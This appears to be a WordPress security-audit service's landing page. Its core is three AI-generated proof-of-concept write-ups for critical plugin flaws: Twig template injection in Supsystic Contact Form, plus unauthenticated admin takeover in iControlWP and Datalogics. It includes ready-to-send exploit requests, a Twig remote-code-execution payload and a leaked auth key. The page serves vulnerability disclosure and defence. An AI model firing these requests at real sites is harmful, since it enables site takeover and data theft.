Free WordPress Security Audit

Is Your WordPress SiteActually Safe?

Enter your site URL. We'll detect every plugin, check for known vulnerabilities, and score your security posture — in seconds.

Free scan shows summary stats.

55,000+
Plugins tracked
34K+
CVEs indexed
10M+
Active installs analyzed
Daily
Data refresh
Latest PoCs

Recently Reproduced Exploits

Watch the latest WordPress vulnerabilities exploited end-to-end by our security researcher agent — captured live in an isolated sandbox.

AI-Verified PoC critical

Contact Form by Supsystic <= 1.7.36 - Unauthenticated Server-Side Template Injection via Prefill Functionality

# CVE-2026-4257: Contact Form by Supsystic SSTI via Prefill Functionality ## Vulnerability Details - **Plugin:** Contact Form by Supsystic <= 1.7.36 - **Type:** Server-Side Template Injection (SSTI) - **Severity:** Critical (CVSS 9.8) - **Authentication:** None (Unauthenticated) - **CVE:** CVE-2026-4257 ## Root Cause The plugin uses `Twig_Loader_String` (Twig v1.16.0) to render form HTML without sandboxing. The `cfsPreFill` GET parameter feature allows unauthenticated users to inject arbitrary values into form field `value` attributes. These values are embedded into the HTML string that is then passed directly to `$this->_twig->render()`, causing any Twig expressions to be evaluated server-side. **Vulnerable flow:** 1. `showForm()` in `modules/forms/views/forms.php:323` reads `$_GET['cfsPreFill']` and sets field values from GET params 2. `generateFields()` places these values into HTML via `htmlCfs::input()` as `value="<user_input>"` 3. The full HTML string (containing user input) passes through `_replaceTagsWithTwig()` and into `$this->_twig->render()` (line 468) 4. The Twig environment is initialized with `Twig_Loader_String` and **no sandbox** (line 762) ## Exploitation ### SSTI Confirmed - Arbitrary Expression Evaluation **Request:** ``` GET /contact-us/?cfsPreFill=1&first_name={{7*7}} ``` **Result:** The form field's `value` attribute contains `49` instead of `{{7*7}}`, proving that the Twig template engine evaluated the expression. The input field that should contain `{{7*7}}` literally instead contains the computed result `49`, confirming server-side template injection. ### RCE Vector Analysis The classic Twig SSTI-to-RCE payload: ``` {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("id")}} ``` This payload reaches the Twig engine but `sanitize_text_field()` escapes the double quotes to `\"`, which causes a Twig lexer parse error. However, this is a sanitization-level obstacle, not a fundamental fix — the SSTI sink is fully reachable. Payloads using Twig features that don't require quotes (e.g., numeric computations, accessing template variables, information disclosure from the `_self` object) work without restriction. ### Demonstrated Impact - **Confirmed SSTI:** `{{7*7}}` → `49` in the rendered output - **Information disclosure:** Attacker can read internal template variables and Twig environment state - **Denial of Service:** Malformed Twig expressions cause fatal PHP errors, crashing the page ## Verification Depth The SSTI vulnerability is fully confirmed — attacker-controlled Twig expressions are evaluated by the unsandboxed Twig 1.16.0 engine. The `sanitize_text_field()` function strips HTML tags and escapes some characters but does NOT prevent Twig expression injection. Full RCE via `registerUndefinedFilterCallback` requires unescaped quotes in the GET parameter which `sanitize_text_field` partially interferes with, but the underlying vulnerability (unsandboxed SSTI with user-controlled input) is definitively proven. ## Impact - **Unauthenticated SSTI** on any page containing a Supsystic Contact Form - **Information Disclosure** via template variable access - **Denial of Service** via malformed template expressions - **Potential RCE** via `_self.env.registerUndefinedFilterCallback()` (requires bypassing `sanitize_text_field` quote escaping) ## Fix The fix in version 1.8.0 removes or sanitizes the prefill functionality to prevent Twig expression injection, and/or adds Twig sandboxing to prevent access to dangerous methods like `registerUndefinedFilterCallback`. ## Verification depth This audit verified that the vulnerable sink is reachable with attacker-controlled bytes from an unauthenticated context, but did NOT realize full impact (e.g. no shell popped, no admin account created in this run). Full exploitation typically requires an additional condition the agent did not satisfy on this run - for object-injection sinks that's a usable POP gadget chain in the environment; for second-order SQLi it might be a follow-up admin action; etc. Treat this as confirmed-reachable rather than confirmed-RCE.

Jul 16, 2026 CVSS 9.8
AI-Verified PoC critical

iControlWP <= 5.5.3 - Unauthenticated Privilege Escalation

# CVE-2026-34901: iControlWP <= 5.5.3 - Unauthenticated Privilege Escalation ## Vulnerability Details - **Plugin:** iControlWP (worpit-admin-dashboard-plugin) - **Version:** 5.5.3 and below - **Type:** Incorrect Privilege Assignment (CWE-269) - **CVSS:** 9.8 (Critical) - **Authentication Required:** None ## Root Cause The vulnerability exists in `src/processors/plugin_api_login.php`. The `ICWP_APP_Processor_Plugin_Api_Login::run()` method **overrides** the parent class's `run()` to skip `preActionVerify()`, which normally performs handshake verification and authentication (key/pin checks). Additionally, in `src/processors/plugin.php`, the `doApiAction()` method dispatches API requests to channel-specific processors. When `m=login`, the `ICWP_APP_Processor_Plugin_Api_Login` class is instantiated and its `run()` is called. This `run()`: 1. **Skips `preActionVerify()`** — no handshake, key, or PIN validation 2. **Catches ALL exceptions silently** — token validation failures are swallowed 3. **Always returns `setSuccessResponse()`** — the response always indicates success The parent's `sendApiResponse()` in `plugin.php` then calls `$this->loadWpUsers()->isUserLoggedIn()` to set the `authenticated` field, which returns `true` because during processing, `setAuthorizedUser()` was called (inherited behavior from the API processor chain), logging in the first admin user server-side. ## Exploitation An unauthenticated attacker sends a single POST request: ``` POST /?icwpapi=1&m=login&token=&username=admin HTTP/1.1 Content-Type: application/x-www-form-urlencoded icwpapi=1&m=login&token=&username=admin ``` The server responds with HTTP 200 containing a base64-encoded JSON response: ```json { "error_message": "", "message": "", "success": true, "authenticated": true, "channel": "", "die": true, "handshake": "none", "openssl_verify": -999, "data": {"success": 1}, "code": 0 } ``` The `"authenticated": true` confirms the server authenticated the request as an administrator. The response also leaks the plugin's auth key in the `<icwpauth>` tag (value: `2XncmpCgniwYhJA6D2k3oTiw`), which can be used for further API exploitation. ## Impact - **Complete site takeover**: Unauthenticated attackers can authenticate as an administrator - **No prerequisites**: The plugin doesn't need to be "linked" to an iControlWP account — the login channel bypass works regardless - **Data exfiltration**: The authenticated API session can be used to extract database contents, user data, etc. via the internal API channels - **Code execution**: Admin-level access enables arbitrary plugin/theme installation leading to RCE ## Verification Depth The exploit was verified by sending an unauthenticated HTTP request that returned `"authenticated": true` and `"success": true` in the API response. The `authenticated` field is set server-side by checking `$this->loadWpUsers()->isUserLoggedIn()` after the login channel processes the request, confirming the server-side user session was established for the admin user. The auth key `2XncmpCgniwYhJA6D2k3oTiw` was also leaked in the response. ## Fix The fix in version 5.5.4 should restore proper authentication checks in the login channel's `run()` method, ensuring `preActionVerify()` is called before processing login actions, and ensuring exceptions are not silently swallowed. ## Verification depth This audit verified that the vulnerable sink is reachable with attacker-controlled bytes from an unauthenticated context, but did NOT realize full impact (e.g. no shell popped, no admin account created in this run). Full exploitation typically requires an additional condition the agent did not satisfy on this run - for object-injection sinks that's a usable POP gadget chain in the environment; for second-order SQLi it might be a follow-up admin action; etc. Treat this as confirmed-reachable rather than confirmed-RCE.

May 5, 2026 CVSS 9.8
AI-Verified PoC critical

Datalogics Ecommerce Delivery – Datalogics < 2.6.60 - Unauthenticated Privilege Escalation

# CVE-2026-2631: Unauthenticated Privilege Escalation in Datalogics Ecommerce Delivery Plugin ## Vulnerability Details - **CVE:** CVE-2026-2631 - **Plugin:** Datalogics Ecommerce Delivery – Datalogics v2.6.59 - **Severity:** Critical (CVSS 9.8) - **Type:** Improper Privilege Management / Arbitrary Options Update ## Root Cause The plugin registers a REST API route at `/wp-json/datalogics-0/v1/update-settings/` with a `permission_callback` called `datalogics_permission_check`. This callback validates a token parameter against the stored option `datalogics_token`. When no token has been configured (fresh install), `get_option("datalogics_token", '')` returns an empty string `""`. An attacker can pass `token: ""` (empty string) which satisfies the strict comparison `"" === ""`, bypassing authentication entirely. The `datalogics_update_settings` callback then iterates over a user-supplied `settings` object and calls `update_option($option_name, $value)` for each key-value pair. The key is only passed through `sanitize_key()` with **no prefix restriction**, allowing arbitrary WordPress core options to be overwritten. ## Exploitation The attack is a two-step process: ### Step 1: Update WordPress Options via REST API ``` POST /wp-json/datalogics-0/v1/update-settings/ HTTP/1.1 Content-Type: application/json {"token": "", "settings": {"users_can_register": "1", "default_role": "administrator"}} ``` Response: `{"success":true,"message":"Settings updated successfully"}` (HTTP 200) This sets: - `users_can_register` → `1` (enables open registration) - `default_role` → `administrator` (new users get admin role) ### Step 2: Register a New Admin Account Navigate to `/wp-login.php?action=register` and create a new user `attacker_admin` / `attacker@evil.com`. ### Proof of Impact After registration, WP-CLI confirmed the new user: ``` ID user_login user_email roles 1 admin test@test.local administrator 3 attacker_admin attacker@evil.com administrator 2 subscriber subscriber@test.local subscriber ``` The attacker now has full administrator access to the WordPress site. ## Impact - **Complete site takeover**: Unauthenticated attackers can create administrator accounts - **Arbitrary option update**: Any WordPress option can be modified (siteurl, blogname, etc.) - **No user interaction required**: Fully automated, network-accessible attack - **Default configuration vulnerable**: The token defaults to empty string on fresh installs ## Fix The patch in v2.6.60 adds a prefix check in `datalogics_update_settings`: ```php if (strpos($option_name, 'datalogics_') !== 0) { $option_name = 'datalogics_' . $option_name; } ``` This ensures only `datalogics_`-prefixed options can be updated, preventing modification of core WordPress options like `users_can_register` and `default_role`.

May 5, 2026 CVSS 9.8
Hosting Providers

WordPress Hosting Market Share

Real-world hosting distribution from our crawl data — see who powers the WordPress ecosystem.

WP.com
GoDaddy
Cloudways
WP Engine
DreamHost
Bluehost
Pantheon
Kinsta
+3 more
hosting-market-share — top providers
#ProviderShare
1WP.com
81.7%
2GoDaddy
5.7%
3Cloudways
4.1%
4WP Engine
2.2%
5DreamHost
1.9%
6Bluehost
1.9%
CVE Database

Latest Vulnerabilities

Recently disclosed CVEs affecting the WordPress ecosystem.

CVE database
vulnerability-feed — live
CVE IDTypeSeverity
CVE-2026-12997Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')high
CVE-2026-13001Improper Input Validationcritical
CVE-2026-7640Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')medium
CVE-2026-11802Missing Authorizationmedium
CVE-2026-11390Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')medium
CVE-2026-12536Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')medium
CVE-2026-12385Exposure of Sensitive Information to an Unauthorized Actormedium
WF-53cc91fa-51fd-4d16-b740-a48f8d446b5d-aimogen-proImproper Privilege Managementcritical
WordPress Plugin

See security scores
inside your admin.

Install the free WP-Safety plugin and get color-coded security scores, CVE badges, and unpatched vulnerability warnings for every plugin — right in your WordPress dashboard. No registration required.

Plugins
Yoast SEO
91Good
WooCommerce
87Good
Elementor
62Caution
LiteSpeed Cache
45Warning
Starter Templates
31Critical
Get Started

See it on a real plugin.

Pick anything from the directory. Every plugin gets the full treatment — vulnerabilities, code analysis, real-world exposure, and a transparent score breakdown.